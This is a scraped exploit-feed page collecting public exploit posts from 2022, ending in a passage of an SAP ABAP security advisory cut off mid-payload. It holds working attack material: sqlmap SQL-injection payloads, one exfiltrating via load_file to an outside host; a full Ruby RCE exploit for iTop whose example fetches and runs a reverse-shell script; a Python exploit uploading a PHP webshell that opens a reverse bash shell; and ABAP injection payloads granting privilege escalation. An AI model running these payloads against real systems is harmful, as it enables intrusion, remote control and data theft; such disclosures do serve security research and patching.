Latest exploits :: CodePwn

<pre><code>## Title: Online Fire Reporting System 1.0 SQLi ## Author: nu11secur1ty ## Date: 05.24.2022 ## Vendor: https://www.sourcecodester.com/users/tips23 ## Software: https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting ## Description: The `date` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+' was submitted in the `date` parameter. The attacker can take administrator accounts control and also of all accounts on this system, also the malicious user can download all information about this system. Status: CRITICAL [+] Payloads: ```mysql --- Parameter: date (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: page=reports&date=2022-05-24'+(select load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'' OR NOT 3052=3052 AND 'yrRg'='yrRg Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=reports&date=2022-05-24'+(select load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'' AND (SELECT 8940 FROM(SELECT COUNT(*),CONCAT(0x7170766b71,(SELECT (ELT(8940=8940,1))),0x7162767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ATCs'='ATCs Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=reports&date=2022-05-24'+(select load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'' AND (SELECT 9304 FROM (SELECT(SLEEP(5)))aaXF) AND 'lAbH'='lAbH Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: page=reports&date=2022-05-24'+(select load_file('\\\\fsbu0e04itt01p7j2gvn75emadg64zznqqeh18px.namaikatiputkata.com\\dvs'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170766b71,0x6d464b4556785048787241587a49795869777141684b4d5252784244626f77424b514675714f7349,0x7162767171),NULL,NULL,NULL# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting) ## Proof and Exploit: [href](https://streamable.com/znojdy) </code></pre>

<pre><code>#!/usr/bin/env ruby # Exploit ## Title: iTop < 2.7.6 - (Authenticated) Remote command execution ## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr) ## Author website: https://pwn.by/noraj/ ## Exploit source: https://github.com/Acceis/exploit-CVE-2022-24780 ## Date: 2022-05-20 ## Vendor Homepage: https://www.combodo.com/itop ## Software Link: https://github.com/Combodo/iTop/archive/refs/tags/2.7.5.tar.gz ## Version: 2.x < 2.7.6 and 3.x.x-beta < 3.0.0 ## Tested on: iTop version 2.7.4 (Ubuntu 18.04.4 LTS - 7.3.28) # Vulnerability ## Discoverer: Markus KRELL ## Date: 2021-10-04 ## Discoverer website: https://markus-krell.de/ ## Discovered on iTop 2.7.4-7194 and 3.0.0-beta-7312 ## Title: Server-Side Template Injection inside customer Portal ## CVE: CVE-2022-24780 ## CWE: CWE-94, CWE-1336 ## Patch: ## - https://github.com/Combodo/iTop/commit/b6fac4b411b8d145fc30fa35c66b51243eafd06b ## - https://github.com/Combodo/iTop/commit/eb2a615bd28100442c7f6171707bb40884af2305 ## - https://github.com/Combodo/iTop/commit/93f273a28778e5da8e51096f021d2dc1adbf4ef3 ## References: ## - https://nvd.nist.gov/vuln/detail/CVE-2022-24780 ## - https://github.com/Combodo/iTop/security/advisories/GHSA-v97m-wgxq-rh54 ## - https://markus-krell.de/itop-template-injection-inside-customer-portal/ require 'httpx' require 'docopt' require 'nokogiri' doc = <<~DOCOPT iTop < 2.7.6 - (Authenticated) Remote command execution Usage: #{__FILE__} full <url> <username> <password> <cmd> [--debug] #{__FILE__} light <url> <username> <password> <cmd> [--debug] #{__FILE__} -h | --help full: exploit with an emulated browser, execute JavaScript, preserve original user profile information light: just parse HTML and send requests, no JavaScript, (DESTRUCTIVE) reset user information: phone, location, function Options: <url> Root URL (base path) including HTTP scheme, port and root folder <username> iTop portal username <password> iTop portal user password <cmd> Command to execute on the target --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} full http://example.org john 's9nvEIZnEo6ghi' 'echo proof > /var/www/html/proof.txt' #{__FILE__} light https://example.org:5000/itop john 's9nvEIZnEo6ghi' 'curl --remote-name http://pentest.example.com:7000/revshell.pl; perl revshell.pl' DOCOPT def login(root_url, user, pass, http) login_url = "#{root_url}/pages/UI.php" params = { 'auth_user' => user, 'auth_pwd' => pass, 'login_mode' => 'form', 'loginop' => 'login' } http.post(login_url, form: params).body.to_s end def login_watir(root_url, user, pass, browser) login_url = "#{root_url}/pages/UI.php" browser.goto login_url browser.text_field(id: 'user').set(user) browser.text_field(id: 'pwd').set(pass) browser.button(value: 'Enter iTop').click end def fetch_form(root_url, http) profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal" # Fetch and parse HTML document doc = Nokogiri.HTML5(http.get(profile_url).body.to_s) action = doc.css('form').first['action'] transaction_id = doc.css('input[name="transaction_id"]').first['value'] form_id = doc.css('form').first['id'] # doesn't work because it's populated with javascript, we'll need watir for that #phone = doc.css('input[id^=field_phone]').first['value'] #location = doc.css('select[id^=field_location_id] option[selected]').first['value'] #function = doc.css('input[id^=field_function]').first['value'] return {action: action, tid: transaction_id, fid: form_id} end def exploit(root_url, cmd, http, browser) form_data = fetch_form(root_url, http) vuln_url = "#{root_url}#{form_data[:action]}" user_info = browser.nil? ? {phone: '', location: '', function: ''} : fetch_form_js(root_url, browser) params = { 'operation' => 'submit', 'stimulus_code' => '', 'transaction_id' => form_data[:tid], # source data already escapes backslashes and double quotes for JSON # so \ -> \\ and " -> \" # but we need to esacpe backslash once for Ruby too because we need an interpolated string # so \ -> \\ -> \\\\ and " -> \\" 'formmanager_class' => 'Combodo\iTop\Portal\Form\ObjectFormManager', 'formmanager_data' => %Q^{"id":"#{form_data[:fid]}","transaction_id":"#{form_data[:tid]}","formmanager_class":"Combodo\\\\iTop\\\\Portal\\\\Form\\\\ObjectFormManager","formrenderer_class":"Combodo\\\\iTop\\\\Renderer\\\\Bootstrap\\\\BsFormRenderer","formrenderer_endpoint":"#{form_data[:action]}","formobject_class":"Person","formobject_id":"1","formmode":"edit","formactionrulestoken":"","formproperties":{"id":"default-user-profile","type":"custom_list","fields":[],"layout":{"type":"twig","content":"<div class=\\"form_field\\" data-field-id=\\"first_name{{['#{cmd}']|filter('system')}}\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"name\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"org_id\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"email\\" data-field-flags=\\"read_only\\"></div><div class=\\"form_field\\" data-field-id=\\"phone\\"></div><div class=\\"form_field\\" data-field-id=\\"location_id\\"></div><div class=\\"form_field\\" data-field-id=\\"function\\"></div><div class=\\"form_field\\" data-field-id=\\"manager_id\\" data-field-flags=\\"read_only\\"></div>"}}}^, 'current_values[phone]' => user_info[:phone], 'current_values[location_id]' => user_info[:location], 'current_values[function]' => user_info[:function] } http.post(vuln_url, form: params).body.to_s end def fetch_form_js(root_url, browser) # those values can't be fetched with nokogiri alone sicne they are populated using javascript profile_url = "#{root_url}/pages/exec.php/user?exec_module=itop-portal-base&exec_page=index.php&portal_id=itop-portal" browser.goto profile_url phone = browser.text_field(name: 'phone').value location = browser.select(name: 'location_id').selected_options.first.value function = browser.text_field(name: 'function').value return {phone: phone, location: location, function: function} end begin args = Docopt.docopt(doc) pp args if args['--debug'] http = HTTPX.plugin(:cookies) login(args['<url>'], args['<username>'], args['<password>'], http) if args['full'] require 'watir' require 'webdrivers' b = Watir::Browser.new :firefox login_watir(args['<url>'], args['<username>'], args['<password>'], b) elsif args['light'] b = nil end exploit(args['<url>'], args['<cmd>'], http, b) rescue Docopt::Exit => e puts e.message end </code></pre>

<pre><code># Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-01-06 # Exploit Author: Malte V # Vendor Homepage: https://github.com/m1k1o/blog # Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip # Version: 1.3 and below # Tested on: Linux # CVE : CVE-2022-23626 import argparse import json import re from base64 import b64encode import requests as req from bs4 import BeautifulSoup parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog') parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False) parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost', required=False) parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081, required=False) parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999, required=False) parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False) parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False) args = vars(parser.parse_args()) username = args['username'] password = args['password'] lhost_ip = args['ip'] lhost_port = args['lport'] address = args['url'] port = args['port'] url = f"http://{address}:{port}" blog_cookie = "" csrf_token = "" exploit_file_name = "" header = { "Host": f"{address}", "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } def get_cookie(complete_url): global blog_cookie cookie_header = {} if not blog_cookie: cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}" result = req.get(url=complete_url, headers=cookie_header) if result.status_code == 200: blog_cookie = result.cookies.get_dict()['PHPSESSID'] print(f'[+] Found PHPSESSID: {blog_cookie}') grep_csrf(result) def grep_csrf(result): global csrf_token csrf_regex = r"[a-f0-9]{10}" soup = BeautifulSoup(result.text, 'html.parser') script_tag = str(soup.findAll('script')[1].contents[0]) csrf_token = re.search(csrf_regex, script_tag).group(0) print(f'[+] Found CSRF-Token: {csrf_token}') def login(username, password): get_cookie(url) login_url = f"{url}/ajax.php" login_data = f"action=login&nick={username}&pass={password}" login_header = { "Host": f"{address}", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } result = req.post(url=login_url, headers=login_header, data=login_data) soup = BeautifulSoup(result.text, 'html.parser') login_content = json.loads(soup.text) if login_content.get('logged_in'): print('[*] Successful login') else: print('[!] Bad login') def set_cookie(result): global blog_cookie blog_cookie = result.cookies.get_dict()['PHPSESSID'] def generate_payload(command): return f""" -----------------------------13148889121752486353560141292 Content-Disposition: form-data; name="file"; filename="malicious.gif.php" Content-Type: application/x-httpd-php GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>; -----------------------------13148889121752486353560141292-- """ def send_payload(): payload_header = { "Host": f"{address}", "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "X-Requested-With": "XMLHttpRequest", "Csrf-Token": f"{csrf_token}", "Cookie": f"PHPSESSID={blog_cookie}" } upload_url = f"http://{address}:{port}/ajax.php?action=upload_image" command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'" payload = generate_payload(command) print(f"[+] Upload exploit") result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"}) set_exploit_file_name(result.content.decode('ascii')) def set_exploit_file_name(data): global exploit_file_name file_regex = r"[a-zA-Z0-9]{4,5}.php" exploit_file_name = re.search(file_regex, data).group(0) def call_malicious_php(file_name): global header complete_url = f"{url}/data/i/{file_name}" print('[*] Calling reverse shell') result = req.get(url=complete_url) def check_reverse_shell(): yes = {'yes', 'y', 'ye', ''} no = {'no', 'n'} choice = input("Have you got an active netcat listener (y/Y or n/N): ") if choice in yes: return True elif choice in no: print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"") return False def main(): enabled_listener = check_reverse_shell() if enabled_listener: login(username, password) send_payload() call_malicious_php(exploit_file_name) if __name__ == "__main__": main() </code></pre>

<pre><code># Information ``` Vulnerability Name : Remote Blind SQL Injections in Inout Blockchain FiatExchanger Product : Inout Blockchain FiatExchanger version : 2.2.1 Date : 2022-05-21 Vendor Site : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/ Exploit Detail : https://github.com/bigb0x/CVEs/blob/main/Inout-Blockchain-FiatExchanger-221-sqli.md CVE-Number : In Progess Exploit Author : Mohamed N. Ali @MohamedNab1l ``` # Description SQL injection attack has been discovered in Blockchain FiatExchanger v2.2.1 platform. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure. ## Vulnerable Parameter: symbol (GET) Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php line 130 ### Sqlmap command: ` python sqlmap.py -u "http://http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652675947&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db --dbs --current-user ` ### output: ` [20:05:54] [INFO] fetched random HTTP User-Agent header value 'Opera/9.20(Windows NT 5.1; U; en)' from file '/root/sqlmap/data/txt/user-agents.txt' [20:05:55] [INFO] testing connection to the target URL [20:05:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: Parameter: symbol (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 1746 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(1746=1746,1))),0x7171627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'hIKU'='hIKU Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: from=1652675947&resolution=5&symbol=BTC-BCH' AND (SELECT 4566 FROM (SELECT(SLEEP(5)))kVcR) AND 'JGrB'='JGrB [20:05:55] [INFO] testing MySQL [20:05:56] [INFO] confirming MySQL [20:05:57] [INFO] the back-end DBMS is MySQL [20:05:57] [INFO] fetching banner [20:05:57] [INFO] resumed: '5.6.50' web application technology: PHP 7.0.33 back-end DBMS: MySQL >= 5.0.0 banner: '5.6.50' [20:05:57] [INFO] fetching current user [20:05:57] [INFO] retrieved: 'root@localhost' current user: 'root@localhost' [20:05:57] [INFO] fetching current database [20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db' current database: 'inout_blockchain_fiatexchanger_db' [20:05:57] [INFO] fetching database names [20:05:57] [INFO] resumed: 'information_schema' [20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_addons_db' [20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_cryptotrading_db' [20:05:57] [INFO] resumed: 'inout_blockchain_fiatexchanger_db' [20:05:57] [INFO] resumed: 'mysql' [20:05:57] [INFO] resumed: 'performance_schema' available databases [6]: [*] information_schema [*] inout_blockchain_fiatexchanger_addons_db [*] inout_blockchain_fiatexchanger_cryptotrading_db [*] inout_blockchain_fiatexchanger_db [*] mysql [*] performance_schema ` <img src="./resources/Blockchain-FiatExchanger-221-sqlmap1.png"> <img src="./resources/Blockchain-FiatExchanger-221-sqlmap2.png"> ## Timeline ``` 2022-05-03: Discovered the bug 2022-05-03: Reported to vendor 2022-05-21: Advisory published ``` ## Discovered by ``` Mohamed N. Ali @MohamedNab1l ali.mohamed@gmail.com ``` </code></pre>

<pre><code># Information ``` Vulnerability Name : Multiple Remote SQL Injections in Inout Blockchain AltExchanger Product : Inout Blockchain AltExchanger version : 1.2.1 Date : 2022-05-21 Vendor Site : https://www.inoutscripts.com/products/inout-blockchain-altexchanger/ Exploit Detail : https://github.com/bigb0x/CVEs/blob/main/Blockchain-AltExchanger-121-sqli.md CVE-Number : In Progess Exploit Author : Mohamed N. Ali @MohamedNab1l ``` # Description Three SQL injections have been discovered in Blockchain AltExchanger cryptocurrency exchange platform v1.2.1. This will allow remote non-authenticated attackers to inject SQL code. This could result in full information disclosure. ## 1- Vulnerable Parameter: symbol (GET) Vulnerability File: /application/third_party/Chart/TradingView/chart_content/master.php ### Sqlmap command: ` python sqlmap.py -u "http://vulnerable-host.com/application/third_party/Chart/TradingView/chart_content/master.php/history?from=1652650195&resolution=5&symbol=BTC-BCH" -p symbol --dbms=MySQL --banner --random-agent --current-db ` ### output: ` Parameter: symbol (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND 7820=7820 AND ('HqKC'='HqKC Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: from=1652650195&resolution=5&symbol=BTC-BCH') AND (SELECT 1060 FROM (SELECT(SLEEP(5)))WJpc) AND ('rQoO'='rQoO [16:43:22] [INFO] testing MySQL [16:43:23] [INFO] confirming MySQL [16:43:26] [INFO] the back-end DBMS is MySQL [16:43:26] [INFO] fetching banner [16:43:26] [INFO] resumed: 5.6.50 web application technology: PHP 7.0.33 back-end DBMS: MySQL >= 5.0.0 banner: '5.6.50' [16:43:26] [INFO] fetching current database [16:43:26] [INFO] retrieved: inout_blockchain_altexchanger_db current database: 'inout_blockchain_altexchanger_db' ` <img src="./resources/Blockchain-AltExchanger-121-sqli-1.png"> ## 2- Vulnerable Parameter: marketcurrency (POST) Vulnerability File: /index.php/coins/update_marketboxslider ### HTTP Request: ---------------------------------------------------- ` POST /index.php/coins/update_marketboxslider HTTP/1.1 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://vulnerable-host.com/ Cookie: inoutio_language=4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Content-Length: 69 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 Host: vulnerable-host.com Connection: Keep-alive displaylimit=4&marketcurrency=-INJEQT-SQL-HERE ` ---------------------------------------------------- ## 3- Vulnerable Parameter: Cookie: inoutio_language (GET) Vulnerability File: /index.php ### HTTP Request: ---------------------------------------------------- ` GET /index.php/home/about HTTP/1.1 Referer: https://www.google.com/search?hl=en&q=testing User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36 x-requested-with: XMLHttpRequest Cookie: inoutio_language=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br Host: vulnerable-host.com Connection: Keep-alive ` ---------------------------------------------------- ## Timeline ``` 2022-05-03: Discovered the bug 2022-05-03: Reported to vendor 2022-05-21: Advisory published ``` ## Discovered by ``` Mohamed N. Ali @MohamedNab1l ali.mohamed at gmail.com ``` </code></pre>

<pre><code># Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi # Date: 19/05/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez # Version: v.3.0.2.0 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter - Save request in BurpSuite - Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs Request : =========== POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 29 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: Keep-alive zemez_newsletter_email=saud =========== Output : Parameter: zemez_newsletter_email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- - Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT (ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220518-0 > ======================================================================= title: Multiple Critical Vulnerabilities product: SAP® Application Server ABAP and ABAP® Platform (Different Software Components) vulnerable version: see section "Vulnerable / tested versions" fixed version: see SAP security notes 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657 CVE number: CVE-2020-6318, CVE-2020-26808, CVE-2020-26832, CVE-2021-21465, CVE-2021-21468, CVE-2021-21466, CVE-2021-21473, CVE-2021-33678 impact: critical homepage: https://www.sap.com found: 08/2020 - 02/2021 by: Fabian Hagg (Office Vienna) Alexander Meier (Office Berlin) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Atos company Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "SAP is a market share leader in enterprise resource planning (ERP), analytics, supply chain management, human capital management, master data management, data integration as well as in experience management" [1]. Customers comprise 92% of the Forbes Global 2000 companies and 98% of the 100 most valued brands. 77% of the world’s transaction revenue touches an SAP system [1, 2]. "SAP NetWeaver Application Server for ABAP (AS ABAP) is a platform on which important business processes run. It provides a complete development and runtime environment for ABAP-based applications. The purpose of AS ABAP is to provide programmers with an efficient means of expressing business logic and relieve them from the necessity of platform-related and purely technical coding. AS ABAP is therefore a basis for all ABAP systems" [3]. "The [successor] ABAP platform provides a reliable and scalable server and programming environment for modern ABAP development [...]. The ABAP platform offers support for SAP HANA and SAP Fiori and allows developers to efficiently build enterprise software that meets the requirements of their business scenarios – on-premise as well as in the cloud" [4]. [1] https://www.sap.com/about/company.html [2] https://www.sap.com/documents/2017/04/4666ecdd-b67c-0010-82c7-eda71 af511fa.html [3] https://help.sap.com/viewer/ff18034f08af4d7bb33894c2047c3b71/7.52.5/ en-US/797de8aa42e24916953c4bb3d983662d.html [4] https://developers.sap.com/topics/abap-platform.html Business recommendation: ------------------------ By exploiting the vulnerabilities documented in this advisory, privileged attackers can take complete control of affected application servers. Thus, successful exploitation can enable fraud, sabotage or data theft while affecting confidentiality, integrity, and availability of business data. SEC Consult recommends to implement security notes 2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657 where the documented issues are fixed according to the vendor. We advise installing the corrections as a matter of priority to keep business-critical data secured. Vulnerability overview/description: ----------------------------------- Advanced Business Application Programming (ABAP)® is a proprietary programming language by SAP SE. In common with every other programming language, ABAP can be susceptible to software vulnerabilities ranging from missing or improper authorization checks to inadequate input validation and output sanitization. Of particular concern are injection vulnerabilities, which can jeopardize the overall system security. Remote Function Call (RFC) is a proprietary network protocol by SAP SE. Comparable to application programming interfaces (APIs), SAP systems come with thousands of built-in function modules implemented in ABAP. RFC allows remote-enabled functions to be accessed via the network. This makes it possible to decentralize business applications even across system boundaries. External programs and external clients can make use of RFC connections to interact with an SAP system via libraries (e.g. NW RFC SDK) provisioned by SAP SE. This advisory covers multiple critical vulnerabilities discovered in the ABAP® coding of standard function modules. These are part of different software components that build upon the bedrock products SAP® Application Server ABAP and ABAP® Platform. 1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform Function modules RSDU_LIST_DB_TABLE_SYB and RSDU_LIST_DB_TABLE_DB4 of function groups RSDU_UTIL_SYB and RSDU_CORE_UTIL_DB4 are vulnerable to ABAP code injection bugs allowing to execute arbitrary ABAP code. Successful exploitation leads to full system compromise. 2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS) Function module CNV_MBT_SEL_STRING_RETURN of function group CNV_MBT_SEL is vulnerable to an ABAP code injection bug allowing to embed arbitrary code into the ABAP Repository. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise. 3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver AS ABAP and SAP S4 HANA (SAP Landscape Transformation) Function module CNV_GET_USERS_FOR_APP_SERVER of function group CNV_00001_HELP does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows to retrieve internal information and to make a targeted SAP system completely unavailable to its intended users. The latter is to be considered as a Denial of Service (DoS) attack. 4) [CVE-2021-21468] Missing Authorization Check in SAP Business Warehouse (Database Interface) Function module RSDL_DB_GET_DATA_BWS of function group RSDL does not perform any programmatically implemented authorization check. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows to read out the entire database including cross-client data access. 5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface) Function module RSDL_DB_GET_DATA_BWS of function group RSDL is vulnerable to a native SQL injection (ADBC) bug allowing to execute arbitrary SQL commands at database level. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise. 6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA Function module RSDRI_DF_TEXT_READ of function group RSDRI_DF_FACADE is vulnerable to an ABAP code injection bug allowing to embed arbitrary code into the ABAP Repository. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation leads to full system compromise. 7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP and ABAP Platform Function module SRM_RFC_SUBMIT_REPORT of function group SRM_REP does not enforce proper authorization checks for critical use of a dynamic program call. An attacker can abuse this bug by invoking the function remotely via the RFC protocol. Successful exploitation allows an attacker to execute existing ABAP reports without holding sufficient authorizations. 8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework) Function module CONVERT_FROM_CHAR_SORT_RFW of function group FG_RFW contains a code injection vulnerability with a limited exploitation primitive. An attacker can abuse this bug to delete critical system tables (e.g. USR02), making the targeted SAP system completely unavailable to its intended users. Proof of concept: ----------------- 1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver (ABAP Server) and ABAP Platform The vulnerable functions make use of the GENERATE SUBROUTINE POOL instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. This code gets executed on the fly by the application server in the course of execution of the functions. The following payload exploits the bug to escalate privileges via reference user assignment: Import Parameter: I_TABLNM Value: USR02 Import Table: I_T_SELECT_FIELDS ╒═══════════════════════════════════════════════════════════════╕ │ RSD_FIELDNM │ ╞═══════════════════════════════════════════════════════════════╡ │ BNAME │ ╘═══════════════════════════════════════════════════════════════╛ Import Table: I_T_WHERE_COND ╒═══════════╤══════╤════════════════════════════════════════════╕ │ FIELDNM │ OP │ LOW │ ╞═══════════╪══════╪════════════════════════════════════════════╡ │ BNAME │ EQ │ S'ENDEXEC. EXEC SQL.UPDATE USREFUS SET │ │ │ │ REFUSER = 'DDIC' WHERE BNAME = 'ATTACKER │ ╘═══════════╧══════╧════════════════════════════════════════════╛ 2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP and S/4 HANA (DMIS) The vulnerable function makes use of the INSERT REPORT instruction by providing source code that is created dynamically using untrusted user input. As there is no input validation or output sanitization, an attacker can inject malicious ABAP code through specific import parameters. Inserted code may be executed by chaining this bug with CVE-2021-21473. The following payload exploits the bug to escalate privileges via reference user assignment: Import Parameter: TABNAME Value: USR02 Import Table: IMT_SELSTRING ╒══════════════════════════════════════════════════════════════╕ │ LINE │ 